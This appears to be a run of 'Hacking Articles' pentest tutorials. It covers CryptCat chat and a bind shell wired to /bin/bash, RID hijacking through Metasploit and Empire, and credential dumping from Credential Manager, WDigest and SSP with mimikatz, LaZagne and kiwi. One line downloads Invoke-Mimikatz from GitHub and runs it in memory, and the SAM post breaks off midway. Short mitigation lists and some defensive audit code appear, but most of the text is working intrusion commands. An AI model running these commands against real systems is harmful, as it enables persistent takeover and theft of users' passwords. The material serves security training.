To create the initiator, we just provide the IP address of the system where we started the listener, followed by its port number:

cryptcat 192.168.0.107 42

Verbose mode

In CryptCat, verbose mode is enabled with the [-v] parameter. Verbose mode prints extended information about our actions. We repeat the chat setup above with verbose mode; when we add [-v] to the CryptCat command it displays information about what it is doing while connecting.

At Listener Side

cryptcat -lvp 42

At Initiator Side

cryptcat -v 192.168.0.107 42

Protect with password

In CryptCat, we can protect the chat connection with a password using the [-k] parameter. CryptCat always encrypts the connection, but without [-k] it uses the well-known default key “metallica”, so anyone sniffing the traffic who knows that default can decrypt it. Supplying our own key with [-k] is what makes the encryption meaningful; the protection is only as strong as the secrecy of that key. We apply it with the following commands.

At the listener side, we apply the [-k] parameter along with the password.

cryptcat -k ignite -lvp 42

At the initiator side, we need to supply the same password that the listener used; otherwise the two ends cannot understand each other.

cryptcat -v -k ignite 192.168.0.107 42

Reverse shell

A reverse shell is a shell in which the target machine connects back to the attacking machine. Note that in the setup shown here the target is the side that listens and the attacker connects to it, so strictly speaking this is a bind shell; the encrypted pipe works the same either way. The listener is wired to /bin/bash through a named pipe, so the pipe must exist before cryptcat starts. On the target, run:

mkfifo myfifo
cryptcat -k mysecret -l -p 3333 0<myfifo | /bin/bash 1>myfifo

At the attacker side, we just connect to the target with the same key. Then we can confirm whose shell we have, and which host, with whoami and ip a:

cryptcat -k mysecret 192.168.0.107 3333
whoami
ip a

Randomize port

If we cannot decide on a port number for the listener, CryptCat has the [-r] parameter, which picks a random local port.

cryptcat -lv -r

Timeout and Delay interval

These two are easily confused. The timeout is the time to wait for a connection to complete and for the final network read, whereas the delay interval is the pause between individual lines sent or ports scanned. In CryptCat the [-w] parameter sets the timeout and the [-i] parameter sets the delay interval. We apply these two parameters as follows.

At the listener side, we apply both the timeout and the delay interval:

cryptcat -v -w 30 -i 10 -l -p 8080

At the initiator, we apply only the timeout:

cryptcat -v -w 2 192.168.0.7 8080

Netcat vs CryptCat

Before comparing the two, we first need to know about Netcat (nc). It is a utility that uses TCP and UDP connections to read from and write to a network. It can be used for both defensive and offensive purposes.

On the offensive side, it can be driven by scripts, which makes it very dependable. On the defensive side, it helps us debug and investigate the network. We have covered Netcat in a previous article; to read it, click here.

CryptCat is a more advanced version of Netcat that adds two-way encryption, making the connection more secure. We compare the two tools on the encryption of the chat connection by capturing their traffic with Wireshark.

Netcat:

As before, we start a listener and an initiator for the chat. Alongside, we start Wireshark to capture the traffic on the interface.

At the listener side, we use the [-l] parameter to listen and the [-p] parameter for the port number.

nc -l -p 3131

At the initiator side, we only need to provide the port number along with the listener's IP address.

nc 192.168.0.111 3131

Now we check whether Wireshark caught anything. As we can see, the capture shows the chat in clear text.

Cryptcat:

We already know that CryptCat provides two-way encryption, which makes the connection more secure than Netcat. We verify this by capturing its chat with Wireshark. Again we need a listener and an initiator.

At the listener side, we use the [-p] parameter for the port and [-l] to start the listener.

cryptcat -l -p 3131

At the initiator side, we just need to provide the IP address along with the listener's port number.

cryptcat 192.168.0.111 3131

Now check whether we can recover anything. As we can see, this chat is encrypted.

That is the main difference between Netcat and CryptCat: one encrypts its traffic and the other does not. Some people put it as CryptCat = Netcat + encryption.

Author: Shubham Sharma is a Pentester and Cybersecurity Researcher. Contact on LinkedIn and Twitter.

The post Comprehensive Guide on CryptCat appeared first on Hacking Articles.

Persistence: RID Hijacking


In this post we discuss RID hijacking, which is classified as a persistence technique in terms of the cyber kill chain, and you will learn multiple ways to perform it.

Table of Content

Introduction

  • FSMO roles
  • SID & RID
  • Syntax
  • Important Key points

RID-Hijacking

  • Metasploit
  • Empire

Introduction

Microsoft divided the responsibilities of a domain controller into FSMO (Flexible Single Master Operation) roles that together make up a full AD system. There are five roles across forest and domain:

  • Schema Master (one per forest)
  • Domain Naming Master (one per forest)
  • Relative identifier (RID) Master (one per domain)
  • Primary Domain Controller (PDC) Emulator (one per domain)
  • Infrastructure Master (one per domain)

SID & RID

The RID (Relative Identifier) is the last part of the SID (security identifier) and is unique for a particular object within a domain. Each security principal has a unique SID issued by a security authority, which can be a Windows local system or a domain. The authority generates the SID when the security principal is created. The SID can be represented as a character string or as a structure.

Syntax

Syntax: S-[Revision]-[IdentifierAuthority]-[SubAuthority0]-[SubAuthority1]-…-[SubAuthority[SubAuthorityCount]](-RID)

Eg: S-1-5-21-1543651058-3042185658-368006193-1001

Important Key points

  • The revision is always 1 for current NT versions.
  • When a new issuing authority is established under Windows (for example, a new computer is deployed or a domain is created), a SID is allocated with identifier authority 5 (SECURITY_NT_AUTHORITY).
  • A constant value of 21 is used as the root of this group of sub-authorities, and a 96-bit random number is generated and parcelled out to the three following sub-authorities, each receiving a 32-bit chunk.
  • If the new issuing authority is a domain, this SID (without the RID) is referred to as the domain SID.
  • Windows allocates RIDs for new accounts starting at 1,000; RIDs below 1,000 are reserved for well-known accounts and groups.
  • For example, an account with a RID of 500 is the built-in Administrator account of its issuing authority, and 501 is the built-in Guest account.
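The SID syntax above can be turned into a small parser. The following is an added example, not code from the original article: it splits a SID string into the fields named in the syntax, strips the RID to recover the issuing authority's SID, and classifies RIDs using the reserved and well-known values listed above (the table of names is mine and deliberately short).

```python
import re

# RIDs below 1000 are reserved; these are the well-known ones this page talks about.
WELL_KNOWN_RIDS = {
    500: "Administrator (built-in)",
    501: "Guest (built-in)",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
}

# S-<revision>-<identifier authority>-<sub-authority>[-<sub-authority>...]
SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")


def parse_sid(sid):
    """Split a textual SID into revision, authority, sub-authorities and RID.

    The last sub-authority is treated as the RID, as in the syntax shown above.
    """
    m = SID_RE.match(sid)
    if not m:
        raise ValueError("not a SID: %r" % (sid,))
    subs = [int(x) for x in m.group(3).split("-")[1:]]
    if any(s > 0xFFFFFFFF for s in subs):
        raise ValueError("sub-authority exceeds 32 bits: %r" % (sid,))
    return {
        "revision": int(m.group(1)),
        "authority": int(m.group(2)),
        "sub_authorities": subs[:-1],
        "rid": subs[-1],
    }


def issuing_authority_sid(sid):
    """Return the SID with the RID stripped (the domain SID for S-1-5-21-... SIDs)."""
    p = parse_sid(sid)
    parts = ["S", str(p["revision"]), str(p["authority"])]
    parts += [str(s) for s in p["sub_authorities"]]
    return "-".join(parts)


def describe_rid(rid):
    """Classify a RID: well-known name, reserved (<1000) or a normally allocated one."""
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    if rid < 1000:
        return "reserved"
    return "allocated"


def has_domain_prefix(sid):
    """True when the SID was issued by a domain or local machine authority (S-1-5-21-...)."""
    p = parse_sid(sid)
    subs = p["sub_authorities"] + [p["rid"]]
    return p["authority"] == 5 and len(subs) >= 4 and subs[0] == 21


if __name__ == "__main__":
    example = "S-1-5-21-1543651058-3042185658-368006193-1001"
    info = parse_sid(example)
    print(example, "->", info, describe_rid(info["rid"]))
    print("issuing authority:", issuing_authority_sid(example))
```

Running it on the example SID from the syntax section reports RID 1001 as an allocated account under the domain SID S-1-5-21-1543651058-3042185658-368006193; feeding it S-1-5-32-544 shows a Builtin alias rather than a domain-issued SID.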

RID Hijacking

RID hijacking is a tactic by which an adversary persists inside a victim's system by assigning the RID of the Administrator account to the Guest account or another local account. This gives the adversary a foothold: they keep regaining access unnoticed, logging on as a low-privilege account that now carries the privileges of the hijacked one.

For this you need an elevated session (administrator or SYSTEM), as we have in the image below, to establish persistence.

Rid-Hijacking: Metasploit

As you know, we had a meterpreter session with admin privileges, and Metasploit provides a module that creates persistence on the victim's machine by hijacking the RID of the administrator user. The module's own description:

This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine. Taking advantage of some Windows Local Users Management integrity issues, this module will allow authenticating with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.

use post/windows/manage/rid_hijack
set getsystem true
set guest_account true
set session 2
set password 123
exploit

Once you run the module, it checks the status of the guest account; if it is disabled, it enables the account first and then overwrites the RID value from 501 to 500, i.e. the RID of the administrator account.

As seen in the step above, the guest account now has RID 500 and password 123, so we log in as Guest to get a shell with Administrator privileges on the target. Here we use Impacket's psexec.py to get a remote CMD shell.

cd impacket/examples
./psexec.py Guest:123@192.168.1.107

As you can observe, we obtained a shell as NT AUTHORITY\SYSTEM. psexec.py always runs its payload as a service (hence SYSTEM); what made it succeed is that the Guest logon now carries the Administrator's RID and is therefore allowed to install that service.
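A defender's counterpart to the module above, as an added example that is not part of the original post: the hijack works by rewriting the RID stored in the account's SAM F value, so comparing each Users sub-key name (the RID the account was created with) against the RID inside its F value exposes a hijacked account. The F-value offsets (RID at 0x30, account-control flags at 0x38) are the ones the public technique and SAM parsers use; they are stated here as assumptions to verify on your own build, and the F blobs below are constructed test data, not dumped from a machine. Reading the live SAM hive requires SYSTEM and is outside this snippet.

```python
import struct

# Offsets inside the SAM "F" value of HKLM\SAM\SAM\Domains\Account\Users\<RID in hex>.
# Assumptions: these are the offsets the public RID-hijacking technique patches (RID)
# and that SAM parsers read for the account-control flags. Verify on your own build.
RID_OFFSET = 0x30        # DWORD, little-endian
ACB_OFFSET = 0x38        # WORD of account-control bits
ACB_DISABLED = 0x0001
F_VALUE_SIZE = 0x50
ADMIN_RID, GUEST_RID = 500, 501


def make_f_value(rid, disabled=False):
    """Build a constructed F value carrying only the fields this check reads (test data)."""
    buf = bytearray(F_VALUE_SIZE)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    struct.pack_into("<H", buf, ACB_OFFSET, ACB_DISABLED if disabled else 0)
    return bytes(buf)


def audit_sam_users(users):
    """users maps each Users sub-key name (hex RID, e.g. '000001F5') to its F value bytes.

    Returns a list of (key_name, finding) tuples. A hijacked account shows up as a key
    whose name disagrees with the RID stored in its F value; an enabled Guest account is
    reported too, because the module above enables it as a side effect.
    """
    findings = []
    for key_name, f_value in users.items():
        key_rid = int(key_name, 16)
        if len(f_value) < ACB_OFFSET + 2:
            findings.append((key_name, "F value too short to parse"))
            continue
        stored_rid = struct.unpack_from("<I", f_value, RID_OFFSET)[0]
        acb = struct.unpack_from("<H", f_value, ACB_OFFSET)[0]
        if stored_rid != key_rid:
            what = " (Administrator)" if stored_rid == ADMIN_RID else ""
            findings.append((key_name, "RID mismatch: key says %d, F says %d%s"
                             % (key_rid, stored_rid, what)))
        if key_rid == GUEST_RID and not acb & ACB_DISABLED:
            findings.append((key_name, "Guest account is enabled"))
    return findings


if __name__ == "__main__":
    # Constructed hive state after the rid_hijack module ran against Guest.
    sample = {
        "000001F4": make_f_value(ADMIN_RID),
        "000001F5": make_f_value(ADMIN_RID),   # Guest's key now claims RID 500
        "000003E9": make_f_value(1001),
    }
    for key, finding in audit_sam_users(sample):
        print(key, finding)
```

Against a clean SAM the function returns nothing; after the hijack the Guest key 000001F5 is reported twice, once for carrying RID 500 and once for being enabled.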

Rid-Hijacking: Empire

RID hijacking is also possible with Empire, but the module is not shipped with the Empire project; you need to clone it from GitHub alongside Empire.

git clone https://github.com/EmpireProject/Empire.git
git clone https://github.com/r4wd3r/RID-Hijacking.git

Once both repositories are cloned, copy the Invoke-RIDHijacking.ps1 file from RID-Hijacking/modules/empire/data/module_source/persistence into /root/Empire/data/module_source/persistence.

cd RID-Hijacking/modules/empire/data/module_source/persistence
cp Invoke-RIDHijacking.ps1 /root/Empire/data/module_source/persistence

Also copy rid_hijack.py from RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated into /root/Empire/lib/modules/powershell/persistence/elevated.

cd RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated
cp rid_hijack.py /root/Empire/lib/modules/powershell/persistence/elevated

Once the configuration is done, launch the module to start the attack. It works just like the Metasploit one: it first identifies the status of the guest account and then hijacks RID 500 for the guest user.

usemodule persistence/elevated/rid_hijack*
set UserGuest True
set Password 123
set Enable True
execute

Then repeat the psexec.py step above to get a CMD shell on the victim's machine; as before, make sure you start from a privileged shell.

Reference

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Persistence: RID Hijacking appeared first on Hacking Articles.

Credential Dumping: Windows Credential Manager


In this article we look at dumping system credentials by exploiting Credential Manager. We cover several methods that can be used in both internal and external penetration tests.

Table of Content:

  • Introduction to credentials manager
  • Accessing credential manager
  • Metasploit
  • Empire
  • Credentialfileview
  • PowerShell
  • Mitigation
  • Conclusion

Introduction to Credential Manager

Credential Manager was introduced with Windows 7. It is like a digital vault that keeps all of your credentials. The credentials are stored in the Credentials folder at %Systemdrive%\Users\<Username>\AppData\Local\Microsoft\Credentials, and it is this folder that Credential Manager reads. It also lets you add, edit, delete, back up and restore passwords.

Credentials saved in credential manager are of two types:

  • Web credentials: As Edge and Windows come from the same company, Credential Manager also holds the passwords saved in the Edge browser, as well as those of other Microsoft applications such as Skype and Microsoft Office.
  • Windows credentials: This category holds Windows logon credentials, along with credentials for other systems on the network.

Any application run by Windows that has your credentials saved will have them stored in Credential Manager automatically. Even when you update them, the change is picked up and updated in Credential Manager too.

Accessing Credential Manager

To access Credential Manager you can simply search for it in the Start menu, or use one of the following two methods:

  • You can open control panel > user accounts > credential manager
  • You can also access it from the command line with the vaultcmd command and its parameters.

When you connect to another system on the network, by whatever method, as in the following image:

and you provide the password and choose to remember it, then these credentials are saved in Credential Manager.

Regardless of the website and its security, when you save a password in Edge or in another application such as Skype or Outlook, that password is also saved in Credential Manager. For instance, we stored a Gmail password in our test, as shown in the image below:

You can confirm from the following image that the password is indeed saved.

Now, when you open Credential Manager by any of these methods, you will find all the system and network passwords in the Windows Credentials tab.

Under the Web Credentials tab you will find application passwords and the passwords saved in Edge.

Metasploit

All these credentials can be dumped quite simply. Once you have a session through Metasploit, all you have to do is upload mimikatz and run it. Mimikatz is an excellent credential dumping tool; we have covered it in detail in a previous article, to read it click here.

To run mimikatz remotely through a Metasploit session, use the following commands:

upload /root/Desktop/mimikatz.exe
shell
cd <location of the uploaded file in the target system>
mimikatz.exe

Once mimikatz is running, its vault::list and vault::cred commands read Credential Manager, and you get the credentials as shown in the image above.

Empire

Similarly, with Empire you can dump the credentials by downloading LaZagne.exe directly onto the target and running it. LaZagne is one of the best credential dumping tools; we have covered it in detail in a previous article, to read it click here.

Use the following commands to dump the credentials with this method :

shell wget https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe -OutFile lazagne.exe
shell dir
shell ./lazagne.exe all

After the execution of commands, you can see that the passwords have been retrieved as shown in the following image:

CredentialsFileView

Our next method uses a third-party tool, CredentialsFileView. It is very effective in internal penetration tests. Simply download and launch it; it will ask you for the Windows password of the user whose credential files it is decrypting.

Once you provide the password, it will give you all the credentials you need as shown in the image below:

Windows PowerShell

This method can prove useful in both internal and external pentesting. Here you run a script in Windows PowerShell; you will find the script here. Once you run it you will have all the web credentials, as shown in the image below:

You can also run PowerShell remotely to dump the credentials with the help of Metasploit. Once you have your session, run the following commands:

load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials

And just like that, the PowerShell commands give you the credentials.

Mitigation

Following are the measures you can use to keep your passwords safe:

  • Do not save passwords in your system, browser or any other application.
  • Use a different password for every account.
  • If you have trouble remembering passwords, use a dedicated password manager instead of keeping them in clear text on your system.
  • Use the latest version of the operating system and applications.
  • Go to the login page manually instead of following a link.
  • Keep the firewall and Windows Defender enabled.
  • Keep your employees and employers aware.

Conclusion  

As this article shows, even though the Credential Manager feature Windows provides is convenient, it is not a security boundary: once an attacker has administrative access to your system, these credentials are there for the taking, as Credential Manager adds no further protection layer against a local administrator. It is important to be aware of every feature your operating system provides so you can protect yourself, and hence to know how to access Credential Manager, how to operate it, and how it can be exploited.

We live in a cyber-active world with login credentials for everything, and nobody can remember every one of them. Credential Manager makes this easy and takes on the job of saving passwords, but at what expense?

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the Covid-19. Take Care and be Healthy and Keep Hacking!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Credential Dumping: Windows Credential Manager appeared first on Hacking Articles.


Credential Dumping: WDigest


This is the third article in our Credential Dumping series. In it we manipulate WDigest in order to retrieve the system credentials. The methods used here apply to both internal and external penetration tests.

Table of Content:

  • Introduction to WDigest
  • Working of WDigest.dll
  • Manual
  • PowerShell
  • Powershell via meterpreter
  • Metasploit Framework
  • PowerShell Empire
  • Mitigation
  • TL; DR

Introduction to Wdigest

WDigest.dll was introduced with Windows XP and was crafted specifically for HTTP Digest and SASL authentication. Its job is to prove knowledge of a secret (the password) in order to authenticate with those protocols; like NTLM, it is a challenge/response scheme. WDigest is enabled by default on Windows XP through Windows 8.0 and Windows Server 2003 through Windows Server 2012, which causes logon credentials to be kept in clear text in LSASS memory. Windows 8.1, Windows Server 2012 R2 and later (including Windows 10 and Server 2016) no longer cache them by default, and Microsoft released a patch (KB2871997) that brings the same control, the UseLogonCredential registry value, to the earlier versions.

Working of WDigest.dll

As it is a challenge-response protocol, it is important to understand how it works. Such protocols require a validating server that issues a challenge containing unpredictable data. A key is derived from the user's password and used to encrypt the challenge, producing a response. The service then validates the user by computing the expected response itself and comparing it with the one received from the client; if they match, the user is authenticated.

Now that we have understood what exactly a WDigest protocol is and how it works, let’s get to practical of how to exploit it.

Manual

Our first method of exploiting WDigest to dump the credentials is manual. It comes in handy in white-box pentesting. Download mimikatz and run the following commands:

privilege::debug
sekurlsa::wdigest

As you can see, the above commands bear no fruit because WDigest caching is not enabled. To enable it, use the following command:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

The above command creates a REG_DWORD value named UseLogonCredential under the WDigest key and sets it to 1, as you can see in the image below:

This step has just enabled WDigest caching on the system, which allows passwords to be kept in memory in clear text. Note that only credentials of logons that happen after the change are cached; users who are already logged on must lock and unlock, or log on again, before their password appears. These passwords can then be retrieved quietly, as you will see further on.

The value is a plain registry setting rather than a Group Policy one, so the policy refresh below is not what makes it take effect (a fresh logon is); we ran it anyway before continuing:

gpupdate /force

Now, if you launch mimikatz again and run the following commands, you will have the credentials.

privilege::debug
sekurlsa::wdigest

PowerShell

In this method we run a PowerShell script on the system that sets the registry value for us, after which we can dump the credentials.

Download WdigestDowngrade.ps1

Simply launch a PowerShell prompt and run the following commands (the last one confirms that the value was written):

Import-Module .\WdigestDowngrade.ps1
Invoke-WdigestDowngrade
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

Once the above commands have executed successfully, run the following to dump the credentials (it fetches Invoke-Mimikatz from PowerSploit and runs it in memory):

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

And as you can see, we got the credentials.

PowerShell via Meterpreter

In this method we run the same PowerShell script from our meterpreter session. Once you have a meterpreter session, run the following commands to create the UseLogonCredential value in the registry:

reg enumkey -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest
load powershell
powershell_import /root/Desktop/Invoke-WdigestDowngrade.ps1
powershell_execute Invoke-WdigestDowngrade

The above commands create the UseLogonCredential value as required. Then launch mimikatz to dump the credentials using the following commands:

Download Invoke-Mimikatz.ps1

load powershell
powershell_import /root/Invoke-Mimikatz.ps1
powershell_execute Invoke-Mimikatz -DumpCreds

Metasploit Framework

Our next method is an excellent way to dump the credentials remotely, which is often a requirement in grey-box pentesting. Once you have your meterpreter session via Metasploit, background the session and run the wdigest_caching post module, which makes the same change under the WDigest key that we made manually in the previous method:

use post/windows/manage/wdigest_caching
set session 1
run

Then load the kiwi extension to dump the credentials:

load kiwi
creds_wdigest

And yes! We got our credentials.

PowerShell Empire

When you have a session through Empire, use the wdigest_downgrade module to create the UseLogonCredential value under the WDigest key and set it to 1, with the following commands:

usemodule management/wdigest_downgrade*
execute

Once that module has executed successfully, you can use another built-in module to dump the credentials with the following commands:

usemodule credentials/mimikatz/command*
set Command sekurlsa::wdigest
execute

And after the execution of the above command, you have the credentials.

Mitigation

Following are the steps one can take in order to secure themselves from this scenario:

  • Set the UseLogonCredential registry value to 0 explicitly to disable caching; on Windows 7/8/2008 R2/2012 with KB2871997 installed, a missing value still means caching is on.
  • If you are using older versions of Windows, make sure the KB2871997 patch is installed.
  • Regularly check, and monitor for changes to, the registry value to make sure it has not been flipped back to 1.

TL; DR

Understanding the basics of your operating system, such as Windows, lets you be more secure. Knowing how the pieces of an endpoint fit together is important, because a seemingly minor change can make you vulnerable: WDigest keeps passwords in memory in clear text, which puts the user's credentials at risk. That is what led us to look at credential dumping through WDigest. With mimikatz, the Metasploit framework and the other tools mentioned above, an attacker can reach those credentials both locally and remotely and use them to their advantage. An attacker who gains administrator privileges on your system can modify the registry value and dump the credentials as shown above using Mimikatz, Metasploit, Empire and PowerShell scripts.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Credential Dumping: WDigest appeared first on Hacking Articles.

Credential Dumping: Security Support Provider (SSP)


In this article, we dump Windows logon credentials by exploiting the SSP mechanism. This is the fourth article in our Credential Dumping series. Both local and remote methods are used, to cover every aspect of pentesting.

Table of content:

  • Introduction to Security Support Provider (SSP)
  • Manual
  • Mimikatz
  • Metasploit Framework
  • Koadic

Introduction to Security Support Provider

A Security Support Provider (SSP) is a DLL that implements an authentication package Windows uses for logon. Each SSP is loaded into the LSA process (lsass.exe) when the system starts, and once loaded it sees every credential that passes through LSA. The list of packages to load is configured in the registry under two values, at the following locations:

HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages

Manual

The first method we use to exploit SSP is manual. Once it is set up and the system reboots, LSA loads our package, which logs the credentials of every logon into a file named kiwissp.log in System32. What goes into the registry is the package name, appended to the Security Packages value under hklm\system\currentcontrolset\control\lsa.

The first step is to copy mimilib.dll from the mimikatz folder to the System32 folder. This DLL is the package that creates the kiwissp file and stores credentials in plaintext for us.

Then navigate to hklm\system\currentcontrolset\control\lsa. Here you can see that there is no entry under Security Packages, as shown in the image below:

The same can be checked with the following command:

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

As shown in the image below, there is no entry, so this needs to be changed if we want to dump the credentials. We need to add all the packages that SSP uses to manage credentials, such as Kerberos, WDigest and so on, together with mimilib. Use the following command to make these entries:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f

Then, to confirm whether the entry has been made, use the following command:

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

You can then navigate again to hklm\system\currentcontrolset\control\lsa to see the entries you just made.

Now, whenever the user reboots and logs in again, a file named kiwissp.log is created in System32 with the credentials stored in clear text. Use the following command to read them:

type C:\Windows\System32\kiwissp.log
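A defender's counterpart to the manual method above, added here as an example and not part of the original article: it parses the text that `reg query` prints for the Lsa key, flags any Security Packages entry that is not in a known-good baseline, and flags the log and DLL names this method leaves in System32. The baseline and the sample output are assumptions; take the baseline from your own golden image.

```python
import re
from typing import Dict, Iterable, List

# Known-good Security Packages list (assumption: a default Windows 10 image; replace
# with the value captured from your own clean build). Compared case-insensitively.
BASELINE_PACKAGES = {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u"}

# File names the manual method above and the mimikatz memssp module leave behind.
ARTIFACT_NAMES = {"kiwissp.log", "mimilsa.log", "mimilib.dll"}

# One value line of `reg query` output: "    <name>    <REG_TYPE>    <data>".
# Key header lines start at column 0 and therefore do not match.
VALUE_LINE = re.compile(
    r"^\s{2,}(?P<name>.+?)\s{2,}(?P<type>REG_[A-Z_]+)(?:\s{2,}(?P<data>.*?))?\s*$"
)


def parse_reg_query(output: str) -> Dict[str, Dict[str, object]]:
    """Parse `reg query <key>` text into {value_name: {"type": ..., "data": ...}}.
    reg.exe prints REG_MULTI_SZ elements separated by a literal backslash-zero
    (the same separator the reg add command above uses), so those are split into a list."""
    values: Dict[str, Dict[str, object]] = {}
    for line in output.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue
        name, vtype = m.group("name"), m.group("type")
        data: object = m.group("data") or ""
        if vtype == "REG_MULTI_SZ":
            data = [part for part in str(data).split("\\0") if part]
        values[name] = {"type": vtype, "data": data}
    return values


def audit_security_packages(values: Dict[str, Dict[str, object]],
                            baseline: Iterable[str] = BASELINE_PACKAGES) -> List[str]:
    """Return SSP names registered under 'Security Packages' that are not in the baseline."""
    entry = values.get("Security Packages")
    if entry is None:
        return []
    data = entry["data"]
    packages = data if isinstance(data, list) else [str(data)]
    allowed = {b.lower() for b in baseline}
    return sorted(p for p in packages if p.lower() not in allowed)


def suspicious_files(system32_listing: Iterable[str]) -> List[str]:
    """Return names from a System32 directory listing that match known SSP-dump artifacts."""
    return sorted(n for n in system32_listing if n.lower() in ARTIFACT_NAMES)


# Constructed sample: what `reg query hklm\system\currentcontrolset\control\lsa`
# prints after the reg add command from the article has been run.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib
    Notification Packages    REG_MULTI_SZ    scecli
"""

if __name__ == "__main__":
    parsed = parse_reg_query(SAMPLE_REG_OUTPUT)
    print("unexpected SSPs:", audit_security_packages(parsed))
    print("artifacts:", suspicious_files(["ntdll.dll", "kiwissp.log", "mimilib.dll"]))
```

On a live host, feed the function the output of `reg query hklm\system\currentcontrolset\control\lsa /v "Security Packages"` and the System32 listing; any hit warrants a look at who wrote the value and when.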

Mimikatz

Mimikatz provides a module that injects itself into memory; when the user signs out of Windows and signs back in, the passwords are retrieved from memory by this module. For this method, just load mimikatz and type:

privilege::debug
misc::memssp

Running the above commands creates a mimilsa.log file in System32 once the user logs in. To read this file, use the following command:

type C:\Windows\System32\mimilsa.log

Metasploit Framework

When dumping credentials remotely, Metasploit really comes in handy. Its kiwi extension lets us dump credentials by manipulating SSP just like the previous method. Once you have a meterpreter session, use the load kiwi command to load the kiwi extension, then inject the mimikatz module into memory with the following command:

kiwi_cmd misc::memssp

The module is now injected into memory. Because it writes the clear-text credential file only when the user logs in after the injection, we force the lock screen on the victim so that the credentials are captured at the next login. For this, run the following commands:

shell
RunDll32.exe user32.dll,LockWorkStation

The user has now been forced to log out. Whenever the user logs in again, the mimilsa file is created in System32; to read it, use the following command:

type C:\Windows\System32\mimilsa.log

Koadic

Just like Metasploit, Koadic provides a similar mimikatz module; so, let's get to dumping the credentials.

Once you have a session with Koadic, use the following module to inject the payload into memory:

use mimikatz_dynwrapx
set MIMICMD misc::memssp
execute

Once the above module has executed successfully, use the following commands to force the user to sign out of Windows and then read the mimilsa file after they sign back in:

cmdshell 0
RunDll32.exe user32.dll,LockWorkStation
type mimilsa.log

As shown in the above image, you will have your credentials.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.


Credential Dumping: SAM


In this article, we learn how passwords are stored in Windows. Of the methods used to hash passwords in SAM we focus on LM and NTLM authentication, and then we learn how to dump these credential hashes from SAM.

Table of Content

  • Introduction to SAM
  • How are passwords stored?
  • LM Authentication
  • NTLM Authentication
  • PwDump7
  • SamDump2
  • Impacket
  • Metasploit Framework
    • HashDump
    • Credential_collector
    • Load_kiwi (Mimikatz)
    • Invoke-PowerDump.ps1
    • Get-PassHashes.ps1
  • Koadic
  • PowerShell Empire
    • Mimikatz/sam
    • Credential/powerdump
  • PowerShell
  • LaZagne
  • Decrypting hash: John The Ripper

Introduction to SAM

SAM is short for Security Account Manager; it manages all the user accounts and their passwords and acts as a database. All passwords are hashed and then stored in SAM. It is the responsibility of the LSA (Local Security Authority) to verify user logins by matching passwords against the database maintained in SAM. SAM starts running in the background as soon as Windows starts. The SAM file is found in C:\Windows\System32\config, and the hashed passwords saved in SAM can be found in the registry: open the registry and navigate to HKEY_LOCAL_MACHINE\SAM.

How are Passwords stored in Windows?

To know how passwords are saved in Windows, we first need to understand LM, NTLM v1 & v2 and Kerberos.

LM authentication

LAN Manager (LM) authentication was developed by IBM for Microsoft's Windows operating systems. The security it provides is considered hackable today. It converts your password into a hash by breaking it into two chunks of seven characters and then encrypting each chunk separately. It is not case sensitive either, which is a huge drawback: as this method converts the whole password to uppercase, an attacker running a brute-force or dictionary attack can ignore lowercase letters altogether. The encryption key used for each chunk is a 56-bit DES key, which can now be easily broken.

NTLM authentication

NTLM authentication was developed to secure your systems as LM proved insecure over time. NTLM is based on a challenge-response mechanism. It uses three components: the nonce (challenge), the response and the authentication.

When a password is stored in Windows, NTLM hashes the password and stores the hash while disposing of the actual password. To authenticate, the client sends the username to the server; the server then creates a random 16-byte string, the nonce, and sends it to the client. The client encrypts the nonce using the hash of the password and sends the result back to the server; this result is called the response. These three components (nonce, username and response) are then sent to the Domain Controller, which looks up the password hash in its Security Account Manager (SAM) database, recomputes the expected response from the nonce and checks whether the two responses match. If they match, authentication is successful.

